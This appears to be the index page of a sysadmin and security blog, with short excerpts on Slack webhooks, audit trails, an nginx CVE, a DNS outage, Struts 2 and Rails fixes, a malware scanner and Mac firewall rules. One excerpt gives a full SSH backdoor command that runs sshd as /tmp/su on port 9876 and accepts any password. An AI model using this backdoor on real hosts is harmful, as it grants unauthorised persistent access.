All Stories

I use Slack for many things and it’s great to see so many integrations are available out of the box. But building integrations yourself is extremely easy using its Incoming Web Hooks. Wouldn’t it be nice if you could see a…

System administrators often want to setup audit trail for accounting purposes. When something abnormal happens, they want to know what happened on system side, when it happened and  who did that. An effective way of audit trail is kind of…

This backdoor has been tested on RHEL-5, 6, 7 and Debian 7, both work well. This command will open a SSH port and allow random password for valid user to login. # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=9876 Typical authentication log on…

Google Security Team discovered a bug in nginx, which might allow an attacker to bypass security restrictions in certain configurations by using a specially crafted request (CVE-2013-4547). This problem affects nginx from 0.8.41 to 1.5.6, and has fixed in 1.5.7,…

As reported by DNSPod, One of China’s largest free DNS service providers, root name server of dotCN got attacked 5 hours ago, and lasted for 2 hours. During that time, most of the dotCN websites are unavailable. .com.cn was also…

There are two critical security vulnerabilities of struts 2 revealed earlier last week, which shook the IT companies that have dependency with this framework, and lots of websites in China were reported having this security issues.

Linux Malware Detect (LMD) is an open source and free malware scanner and detector for Unix/Linux based operating systems, released under GNU GPLv2. It is designed to figure out threats faced by shared hosting environments.

Rails has announced the availability of 3 news versions today,  3.2.13, 3.1.12, and 2.3.18, these releases contain important security fixes. It is recommended users upgrade as soon as possible.

I had occasion recently to try and figure out how to use the builtin firewall to prevent some “bot” from hitting the services running on a Macbook. Mac OS X comes with the FreeBSD firewall program that called IPFW. It’s…